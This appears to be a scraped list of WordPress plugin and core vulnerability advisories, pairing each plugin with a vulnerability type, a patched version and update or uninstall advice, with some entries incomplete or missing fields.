Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Content text slider on post

Vulnerability: Cross-Site Scripting
Patched Version: 6.9
Recommended Action: Update to version 6.9, or a newer patched version

Plugin: Akismet Anti-spam: Spam Protection

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Authenticated File Deletion
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: LIQUID SPEECH BALLOON

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_edit_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Websimon Tables

Core: WordPress

Vulnerability: LoDash Update
Patched Version: 5.4.7
Recommended Action: Update to one of the following versions, or a newer patched version: 5.4.7, 5.5.6, 5.6.5, 5.7.3, 5.8.1

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery To Staff Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: IgniteUp – Coming Soon and Maintenance Mode

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Missing Authorization via multiple AJAX functions
Patched Version: 5.16.2
Recommended Action: Update to version 5.16.2, or a newer patched version

Plugin: Aviary Image Editor Add-on For Gravity Forms

Plugin: WP Super Cache

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.9
Recommended Action: Update to version 1.4.9, or a newer patched version

Plugin: WP Customer Reviews

Vulnerability: Multiple Stored Cross-Site Scripting
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: PlanSo Forms

Plugin: Email posts to subscribers

Plugin: Verification Code for Comments

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Arbitrary Image Renaming
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: Save as PDF Plugin by Pdfcrowd

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via admin settings
Patched Version: 2.16.1
Recommended Action: Update to version 2.16.1, or a newer patched version

Plugin: WassUp Real Time Analytics

Vulnerability: 1.4.3
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: salesking

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 1.6.30
Recommended Action: Update to version 1.6.30, or a newer patched version

Plugin: Note Press

Vulnerability: Authenticated (Admin+) SQL Injection via ids Parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction

Vulnerability: SQL Injection
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Ultimate Addons for WPBakery

Vulnerability: Authenticated(Contributor+) Local File Inclusion
Patched Version: 3.19.15
Recommended Action: Update to version 3.19.15, or a newer patched version

Plugin: 3dady real-time web stats

Plugin: vn-calendar

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 1.7.0.13
Recommended Action: Update to version 1.7.0.13, or a newer patched version

Plugin: Bootstrap Shortcodes

Plugin: MP3-jPlayer

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: MyTube PlayList

Vulnerability: Reflected Cross-Site Scripting via addplaylistid
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LA-Studio Element Kit for Elementor

Vulnerability: Missing Authorization
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Polo Video Gallery – Best wordpress video gallery plugin

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 5.16.0
Recommended Action: Update to version 5.16.0, or a newer patched version

Plugin: All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs – My Sticky Elements

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Security & Malware scan by CleanTalk

Vulnerability: IP Spoofing to Protection Mechanism Bypass
Patched Version: 2.121
Recommended Action: Update to version 2.121, or a newer patched version

Plugin: Namaste! LMS

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.5.9.4
Recommended Action: Update to version 2.5.9.4, or a newer patched version

Plugin: Events Addon for Elementor

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: WordPress Tag, Category, and Taxonomy Manager – AI Autotagger

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 3.6.5
Recommended Action: Update to version 3.6.5, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: No subtitle
Patched Version: 3.13.3
Recommended Action: Update to version 3.13.3, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Featured Image alt Attribute
Patched Version: 8.2.0
Recommended Action: Update to version 8.2.0, or a newer patched version

Plugin: iMember360is

Vulnerability: 3.9.001
Patched Version: 3.9.001
Recommended Action: Update to version 3.9.001, or a newer patched version

Plugin: Super Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: WP Custom Fields Search

Vulnerability: Cross-Site Scripting
Patched Version: 1.0
Recommended Action: Update to version 1.0, or a newer patched version

Plugin: RSS for Yandex Turbo

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.30
Recommended Action: Update to version 1.30, or a newer patched version

Plugin: Remove Footer Credit

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Social proof testimonials and reviews by Repuso

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.02
Recommended Action: Update to version 5.02, or a newer patched version

Plugin: Health Check & Troubleshooting

Vulnerability: Missing Authorization Checks
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Redirection for Contact Form 7

Vulnerability: Authenticated(Editor+) Privilege Escalation
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: Crayon Syntax Highlighter

Vulnerability: Authenticated (Contributor+) Server Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Tiles

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.1.1
Recommended Action: Update to one of the following versions, or a newer patched version: 5.1.1, 5.2.2, 5.3.1, 5.4.1, 5.5.2, 5.6.2, 5.7.2, 5.8.1, 5.9.1, 6.0.1, 6.1.2, 6.2.2, 6.3.4, 6.4.3, 6.5.1, 6.6.2, 6.7.1, 6.8.2, 6.9.1, 7.0.2, 7.1.2, 7.2.2, 7.3.2, 7.4.2, 7.5.4, 7.6.1, 7.7.3, 7.8.1, 7.9.1

Plugin: leenk.me

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.6.0
Recommended Action: Update to version 2.6.0, or a newer patched version

Plugin: Educare – Students & Result Management System

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: WP Duplicate Page

Vulnerability: Authenticated (Admin+) Stored Cross Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Digital Climate Strike WP

Vulnerability: Malicious Redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Dovetail

Plugin: NOSpamPTI

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Missing Authorization
Patched Version: 5.6.0
Recommended Action: Update to version 5.6.0, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.66
Recommended Action: Update to version 1.2.66, or a newer patched version

Plugin: Email Encoder – Protect Email Addresses and Phone Numbers

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.0.10
Recommended Action: Update to version 5.0.10, or a newer patched version

Plugin: WP Markdown Editor (Formerly Dark Mode)

Vulnerability: Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX

Vulnerability: Gutenberg Blocks for Post Grid <= 2.4.9
Patched Version: 2.4.10
Recommended Action: Update to version 2.4.10, or a newer patched version

Plugin: Team Showcase

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.22.16
Recommended Action: Update to version 1.22.16, or a newer patched version

Plugin: WP-DBManager

Vulnerability: Directory Traversal Allowing Arbitrary File Deletion
Patched Version: 2.79.2
Recommended Action: Update to version 2.79.2, or a newer patched version

Plugin: URL Shortener by MyThemeShop

Vulnerability: Reflected Cross-Site Scripting via ‘page’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina)

Vulnerability: Sensitive Information Exposure
Patched Version: 6.4.6
Recommended Action: Update to version 6.4.6, or a newer patched version

Plugin: CatalogX – Product Catalog Mode For WooCommerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: WP Symposium Pro

Vulnerability: Cross-Site Scripting
Patched Version: 16.01
Recommended Action: Update to version 16.01, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Improper Authorization via wcal_delete_expired_used_coupon_code
Patched Version: 5.16.1
Recommended Action: Update to version 5.16.1, or a newer patched version

Plugin: WP All Import Pro

Vulnerability: SQL Injection
Patched Version: 4.1.2
Recommended Action: Update to version 4.1.2, or a newer patched version

Plugin: Jupiter X Core

Vulnerability: Missing Authorization Checks
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: ContentStudio

Vulnerability: Missing Authorization
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Email Before Download

Vulnerability: SMTP Header Injection
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: SQL Injection
Patched Version: 5.0.2.2
Recommended Action: Update to version 5.0.2.2, or a newer patched version

Plugin: Wholesale Market for WooCommerce

Vulnerability: Authenticated (Administrator+) Arbitrary File Download
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Reviews Plus

Vulnerability: Denial of Service
Patched Version: 1.2.15
Recommended Action: Update to version 1.2.15, or a newer patched version

Plugin: RapidExpCart

Plugin: PrettyLinks – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Cross-Site Request Forgery via route
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: YAWPP (Yet Another WordPress Petition Plugin)

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.5.12
Recommended Action: Update to version 1.5.12, or a newer patched version

Plugin: SpiderCatalog

Plugin: Quick Event Manager

Vulnerability: Missing Authorization Checks
Patched Version: 9.7.5
Recommended Action: Update to version 9.7.5, or a newer patched version

Plugin: Email Template Designer – WP HTML Mail

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: LWS Hide Login

Vulnerability: Protection Mechanism Bypass
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Colibri Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.241
Recommended Action: Update to version 1.0.241, or a newer patched version

Plugin: Smart Forms – when you need more than just a contact form

Vulnerability: Missing Authorization
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Seraphinite Accelerator

Vulnerability: Reflected Cross-Site Scripting via rt
Patched Version: 2.20.29
Recommended Action: Update to version 2.20.29, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Cross-Site Request Forgery via init
Patched Version: 1.18.1
Recommended Action: Update to version 1.18.1, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated SQL Injection
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: WooCommerce Extra Cost

Plugin: Woocommerce Vietnam Checkout

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Custom Content Shortcode

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Paytm Payment Donation

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Rating-Widget: Star Review System

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcodes
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: UltimateWoo – The Ultimate WooCommerce Plugin with Unlimited Usage

Plugin: LeagueManager

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Wp anything slider

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 9.2
Recommended Action: Update to version 9.2, or a newer patched version

Plugin: WordPress Page Contact

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘bulkDelete’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: MP3-jPlayer

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.12
Recommended Action: Update to version 1.8.12, or a newer patched version

Plugin: Button Widget Smartsoft

Plugin: Simple Table Manager

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Zoom

Plugin: WP Video Gallery

Plugin: Google Forms

Vulnerability: Cross-Site Scripting
Patched Version: 0.85
Recommended Action: Update to version 0.85, or a newer patched version

Plugin: multimedial images

Plugin: Social Share Boost

Vulnerability: Cross-Site Request Forgery via ‘syntatical_settings_content’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Stats-Dashboard

Plugin: WP Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via icon_color
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: WP SimpleMail

Plugin: Name Directory

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.25.4
Recommended Action: Update to version 1.25.4, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.6.12
Recommended Action: Update to version 7.6.12, or a newer patched version

Plugin: System Dashboard

Vulnerability: Missing Authorization to Information Disclosure (sd_db_specs)
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: Smush Image Optimization – Optimize Images | Compress & Lazy Load Images | Convert WebP | Image CDN

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: weForms – Easy Drag & Drop Contact Form Builder For WordPress

Vulnerability: CSV injection via form entry
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: Orbit Fox by ThemeIsle

Vulnerability: Authenticated Privilege Escalation
Patched Version: 2.10.3
Recommended Action: Update to version 2.10.3, or a newer patched version

Plugin: Coupon Zen

Vulnerability: Cross-Site Request Forgery to Plugin Activation
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: WooCommerce Login Redirect

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated Arbitrary File Creation
Patched Version: 2.21.0
Recommended Action: Update to version 2.21.0, or a newer patched version

Plugin: WP Simple Events

Plugin: Conditional Shipping for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Simple:Press Forum

Vulnerability: Arbitrary File Upload
Patched Version: 6.6.1
Recommended Action: Update to version 6.6.1, or a newer patched version

Plugin: Slick Popup: Contact Form 7 Popup Plugin

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.15
Recommended Action: Update to version 1.7.15, or a newer patched version

Plugin: A WordPress Testimonial Plugin to Showcase Testimonial Slider, Testimonial Grid and More: Solid Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Double Opt-In for Download

Vulnerability: SQL Injection
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Gallery PhotoBlocks

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Ad Invalid Click Protector (AICP)

Vulnerability: Reflected Cross-Site Scripting and Cross-Site Request Forgery
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: wpCentral

Vulnerability: Improper Access Control to Privilege Escalation
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: AutomateWoo

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.7.2
Recommended Action: Update to version 5.7.2, or a newer patched version

Plugin: WP Booking System – Booking Calendar

Vulnerability: Authenticated (Admin+) Stored Cross Site Scripting
Patched Version: 2.0.18.1
Recommended Action: Update to version 2.0.18.1, or a newer patched version

Plugin: Ads by datafeedr.com

Vulnerability: Unauthenticated (Limited) Remote Code Execution
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: mypixs

Plugin: ElasticPress Debugging Add-On

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Missing Authorization to Plugin Cache Reset
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Word Balloon

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.20.3
Recommended Action: Update to version 4.20.3, or a newer patched version

Plugin: Beautiful Cookie Consent Banner

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.10.2
Recommended Action: Update to version 2.10.2, or a newer patched version

Plugin: WP Mail SMTP by WPForms – The Most Popular SMTP and Email Log Plugin

Vulnerability: Unspecified Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: SQL Injection
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: wp-guestmap

Plugin: CM Tooltip Glossary

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Carousel Slider

Vulnerability: Missing Authorization
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Social Photo Gallery

Plugin: wpDataTables (Premium)

Vulnerability: Blind SQL Injection via start Parameter
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Brizy – Page Builder

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.30
Recommended Action: Update to version 2.4.30, or a newer patched version

Plugin: Database Browser

Plugin: Webmaster Tools Verification

Vulnerability: Missing Authorization to Arbitrary Plugin Deactivation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Thumbnail Slider With Lightbox

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Image Title
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.0.1.9
Recommended Action: Update to version 5.0.1.9, or a newer patched version

Plugin: Software License Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.4.6
Recommended Action: Update to version 4.4.6, or a newer patched version

Plugin: Slider by Supsystic

Vulnerability: Missing Authorization
Patched Version: 1.8.7
Recommended Action: Update to version 1.8.7, or a newer patched version

Plugin: Advanced Post Manager

Vulnerability: PHP Object Injection
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: Reviews and Rating – Google Reviews

Vulnerability: Missing Authorization
Patched Version: 4.15
Recommended Action: Update to version 4.15, or a newer patched version

Plugin: Woocommerce Shipping Canada Post

Vulnerability: Missing Authorization
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Unprotected REST-API to Sensitive Information Disclosure
Patched Version: 3.5.8
Recommended Action: Update to version 3.5.8, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Zoho CRM Lead Magnet

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.2.9
Recommended Action: Update to version 1.7.2.9, or a newer patched version

Plugin: WooCommerce

Vulnerability: WooCommerce File Deletion
Patched Version: 3.4.6
Recommended Action: Update to version 3.4.6, or a newer patched version

Plugin: Estatik Real Estate Plugin

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress

Vulnerability: Missing Authorization
Patched Version: 8.3.0
Recommended Action: Update to version 8.3.0, or a newer patched version

Plugin: CloudNet360

Plugin: File Gallery

Vulnerability: Remote Code Execution
Patched Version: 1.7.9.2
Recommended Action: Update to version 1.7.9.2, or a newer patched version

Plugin: Houzez CRM

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Connections Business Directory

Vulnerability: Authorization Bypass
Patched Version: 0.7.1.6
Recommended Action: Update to version 0.7.1.6, or a newer patched version

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

Vulnerability: Reflected Cross-Site Scripting via ‘post_id’
Patched Version: 118
Recommended Action: Update to version 118, or a newer patched version

Plugin: Who Hit The Page – Hit Counter

Plugin: Add Multiple Marker

Vulnerability: Missing Authorization Checks to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Affiliate Super Assistent

Vulnerability: Cross-Site Request Forgery to Settings Update and Cache Clearing
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Forms Ada – Form Builder

Vulnerability: Reflected Cross-Site Scripting via ‘p’ parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Church Admin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 0.810
Recommended Action: Update to version 0.810, or a newer patched version

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Authorization Bypass
Patched Version: 3.0.10
Recommended Action: Update to version 3.0.10, or a newer patched version

Plugin: Custom Website Data

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Stored Cross-site Scripting
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Rename Media Files: Improve Your WordPress SEO

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: 4ECPS Web Forms

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.2.18
Recommended Action: Update to version 0.2.18, or a newer patched version

Plugin: AI Power: Complete AI Pack

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.13
Recommended Action: Update to version 1.8.13, or a newer patched version

Plugin: Solid Central – Site Management, Backups, Security, and Reporting

Vulnerability: Stored Cross-Site Scripting via packages
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Gallery with thumbnail slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.1
Recommended Action: Update to version 6.1, or a newer patched version

Plugin: Branda – Branda – White Label & Branding, Custom Login Page Customizer

Vulnerability: IP Address Spoofing
Patched Version: 3.4.15
Recommended Action: Update to version 3.4.15, or a newer patched version

Plugin: Spacer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: mini-mail-dashboard-widget

Vulnerability: Cross-Site Scripting
Patched Version: 1.43
Recommended Action: Update to version 1.43, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated Post Meta Change
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: PHP Object Injection via Shortcode
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: WP Adminify – Custom WordPress Dashboard, Login and Admin Customizer

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: JS Job Manager

Vulnerability: Missing Authorization
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: SendPress Newsletters

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.11
Recommended Action: Update to version 2.6.11, or a newer patched version

Plugin: ZhuiGe Official Website Mini Program

Vulnerability: SQL Injection
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: TC Custom JavaScript

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Cross-Site Scripting
Patched Version: 1.57
Recommended Action: Update to version 1.57, or a newer patched version

Plugin: Contact Form by WD – responsive drag & drop contact form builder tool

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.13.5
Recommended Action: Update to version 1.13.5, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 7.13.53
Recommended Action: Update to version 7.13.53, or a newer patched version

Plugin: Cart66 Lite :: WordPress Ecommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: WP Reactions Lite

Vulnerability: Cross-Site Request Forgery via AJAX action
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: Ninja Forms Google Sheet Connector

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Missing Authorization to Captcha Setting Update
Patched Version: 2.3.2
